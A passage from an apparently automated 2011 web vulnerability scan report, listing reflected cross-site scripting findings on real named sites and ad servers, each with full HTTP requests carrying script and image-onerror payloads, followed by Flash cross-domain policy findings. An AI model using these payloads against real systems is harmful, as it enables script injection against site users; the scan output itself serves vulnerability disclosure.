<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_servicese9fda"><script>alert(1)</script>b70efdb17f9/internet-domain-names');" title="Email Page">
...[SNIP]...

4.180. http://www.wolfgreenfield.com/practices_services/internet-domain-names [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wolfgreenfield.com
Path:	/practices_services/internet-domain-names

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75a92"><script>alert(1)</script>9aa36121da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services/internet-domain-names75a92"><script>alert(1)</script>9aa36121da HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:35 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services/internet-domain-names75a92"><script>alert(1)</script>9aa36121da');" title="Email Page">
...[SNIP]...

4.181. http://www.wolfgreenfield.com/practices_services/internet-domain-names [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wolfgreenfield.com
Path:	/practices_services/internet-domain-names

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1054a"><script>alert(1)</script>764b2703e6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services/internet-domain-names?1054a"><script>alert(1)</script>764b2703e6d=1 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:33 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 22451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services/internet-domain-names?1054a"><script>alert(1)</script>764b2703e6d=1');" title="Email Page">
...[SNIP]...

4.182. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wolfgreenfield.com
Path:	/practices_services/v_arrow.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 112f8"><script>alert(1)</script>30080c8fca4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services112f8"><script>alert(1)</script>30080c8fca4/v_arrow.gif HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/practices_services/internet-domain-names
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:33 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services112f8"><script>alert(1)</script>30080c8fca4/v_arrow.gif');" title="Email Page">
...[SNIP]...

4.183. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wolfgreenfield.com
Path:	/practices_services/v_arrow.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 653a6"><script>alert(1)</script>2fcbffe32e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services/v_arrow.gif653a6"><script>alert(1)</script>2fcbffe32e0 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/practices_services/internet-domain-names
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:33 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services/v_arrow.gif653a6"><script>alert(1)</script>2fcbffe32e0');" title="Email Page">
...[SNIP]...

4.184. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wolfgreenfield.com
Path:	/practices_services/v_arrow.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ec0c"><script>alert(1)</script>f8e70455e0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services/v_arrow.gif?5ec0c"><script>alert(1)</script>f8e70455e0b=1 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/practices_services/internet-domain-names
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:32 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services/v_arrow.gif?5ec0c"><script>alert(1)</script>f8e70455e0b=1');" title="Email Page">
...[SNIP]...

4.185. http://adserving.cpxinteractive.com/st [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://adserving.cpxinteractive.com
Path:	/st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fb61'-alert(1)-'ef62d92b22c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /st?ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=5fb61'-alert(1)-'ef62d92b22c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:03:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:03:50 GMT
Content-Length: 486

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=0&referrer=http://www.google.com/search%3Fhl=en%26q=5fb61'-alert(1)-'ef62d92b22c&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1748713%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3
...[SNIP]...

4.186. http://da.newstogram.com/hg.php [DMUserTrack cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://da.newstogram.com
Path:	/hg.php

Issue detail

The value of the DMUserTrack cookie is copied into the HTML document as plain text between tags. The payload 80608<img%20src%3da%20onerror%3dalert(1)>ced85d84f5e was submitted in the DMUserTrack cookie. This input was echoed as 80608<img src=a onerror=alert(1)>ced85d84f5e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:46 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C780608%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eced85d84f5e; expires=Fri, 11-May-2012 11:37:46 GMT; domain=.newstogram.com
Content-Length: 166

Newstogram.completed({"Histogram":{"status":"saved","uid":"896A200B-7889-4691-9DB7-6D96659E63C780608<img src=a onerror=alert(1)>ced85d84f5e","ip":"173.193.214.243"}})

4.187. http://seg.sharethis.com/getSegment.php [__stid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seg.sharethis.com
Path:	/getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload bc53c<script>alert(1)</script>7938f70db0c was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F&jsref=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2F&rnd=1305203804180 HTTP/1.1
Host: seg.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==bc53c<script>alert(1)</script>7938f70db0c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Thu, 12 May 2011 12:36:45 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368

           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">

...[SNIP]...
<div style='display:none'>clicookie:CspjoE3JR6aX8hTKEPglAg==bc53c<script>alert(1)</script>7938f70db0c
userid:
</div>
...[SNIP]...

4.188. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/3/foxbusiness/300x250/ros

Request

GET /bloomberg/trc/2/json?publisher=bloomberg&pv=2&list-size=9&list-id=rbox-t2v&id=237&uim=horizontal-t2v&intent=s&uip=horizontal-t2v&item-id=http%3A%2F%2Fwww.bloomberg.com%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&item-type=text&item-url=http%3A%2F%2Fwww.bloomberg.com%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&page-id=8b30818aaf47422a6a90e7b9a6ea55e93a6ee14a&cv=4-6-15-45512-2660204&uiv=default HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img%20src%3da%20onerror%3dalert(1)>7feb297df63

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:15 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain; charset=utf-8
Set-Cookie: taboola_user_id="d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img src=a onerror=alert(1)>7feb297df63";Path=/;Expires=Fri, 11-May-12 11:39:15 GMT
Set-Cookie: taboola_session_id="v1_bb2bb5149baf45530a5e69614e17e0c0_d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img src=a onerror=alert(1)>7feb297df63_1305200355_1305200355";Path=/bloomberg/
Set-Cookie: JSESSIONID=.prod2-f1;Path=/
Set-Cookie: taboola_wv=;Path=/bloomberg/;Expires=Fri, 11-May-12 11:39:15 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 7365

trc_json_response =
{"trc":{"req":"46ab7eb1276e8dc36cb3699da961992a","session-id":"bb2bb5149baf45530a5e69614e17e0c0","session-data":"v1_bb2bb5149baf45530a5e69614e17e0c0_d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img src=a onerror=alert(1)>7feb297df63_1305200355_1305200355","user-id":"d80f7856-eeab-487a-988c-f15ce2ff8eb0c2917<img src=a onerror=alert(1)>
...[SNIP]...

4.191. http://www.pillsburylaw.com/index.cfm [PCUSERNAME cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pillsburylaw.com
Path:	/index.cfm

Issue detail

The value of the PCUSERNAME cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b051f"><img%20src%3da%20onerror%3dalert(1)>f07a5d839af was submitted in the PCUSERNAME cookie. This input was echoed as b051f"><img src=a onerror=alert(1)>f07a5d839af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=b051f"><img%20src%3da%20onerror%3dalert(1)>f07a5d839af; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.2.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A21%3A46; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:32:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
<input type="text" name="pcusername" id="pcusername" value="b051f"><img src=a onerror=alert(1)>f07a5d839af" onblur="if(this.value.length == 0){this.value='Email Address'};" onfocus="if(this.value=='Email Address'){this.value=''};" class="required email" alias="Username" style="width:94%;">
...[SNIP]...

5. Flash cross-domain policy previous next
There are 27 instances of this issue:

http://ad.doubleclick.net/crossdomain.xml
http://ad.us.doubleclick.net/crossdomain.xml
http://apps.shareholder.com/crossdomain.xml
http://b.scorecardresearch.com/crossdomain.xml
http://bs.serving-sys.com/crossdomain.xml
http://by.optimost.com/crossdomain.xml
http://ds.serving-sys.com/crossdomain.xml
http://engine.cmmeglobal.com/crossdomain.xml
http://feeds.feedburner.com/crossdomain.xml
http://js.revsci.net/crossdomain.xml
http://pix04.revsci.net/crossdomain.xml
http://secure-us.imrworldwide.com/crossdomain.xml
http://wt.o.nytimes.com/crossdomain.xml
http://add.my.yahoo.com/crossdomain.xml
http://dealbook.nytimes.com/crossdomain.xml
http://googleads.g.doubleclick.net/crossdomain.xml
http://graphics8.nytimes.com/crossdomain.xml
http://markets.on.nytimes.com/crossdomain.xml
http://media.ft.com/crossdomain.xml
http://pagead2.googlesyndication.com/crossdomain.xml
http://pubads.g.doubleclick.net/crossdomain.xml
http://timespeople.nytimes.com/crossdomain.xml
http://www.facebook.com/crossdomain.xml
http://www.ft.com/crossdomain.xml
http://www.nytimes.com/crossdomain.xml
http://pillsburylaw.app4.hubspot.com/crossdomain.xml
http://stats.ft.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Thu, 12 May 2011 11:01:15 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.2. http://ad.us.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.us.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.us.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Thu, 12 May 2011 11:03:16 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.3. http://apps.shareholder.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://apps.shareholder.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: apps.shareholder.com

Response

HTTP/1.1 200 OK
Content-Length: 96
Content-Type: text/xml
Content-Location: http://apps.shareholder.com/crossdomain.xml
Last-Modified: Tue, 23 Oct 2007 19:01:53 GMT
Accept-Ranges: bytes
ETag: "dd25e02ca715c81:caff3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:07:08 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

5.4. http://b.scorecardresearch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 11:04:16 GMT
Date: Thu, 12 May 2011 11:04:16 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

5.5. http://bs.serving-sys.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 12 May 2011 11:03:16 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

5.6. http://by.optimost.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://by.optimost.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: by.optimost.com

Response

HTTP/1.0 200 OK
Server: Fast
Content-Type: text/xml
Content-Length: 200
Accept-Ranges: bytes
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Expires: Thu, 12 May 2011 11:03:16 GMT
Pragma: no-cache
Date: Thu, 12 May 2011 11:03:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.7. http://ds.serving-sys.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ds.serving-sys.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Thu, 12 May 2011 11:03:34 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

5.8. http://engine.cmmeglobal.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://engine.cmmeglobal.com
Path:	/crossdomain.xml

Issue detail

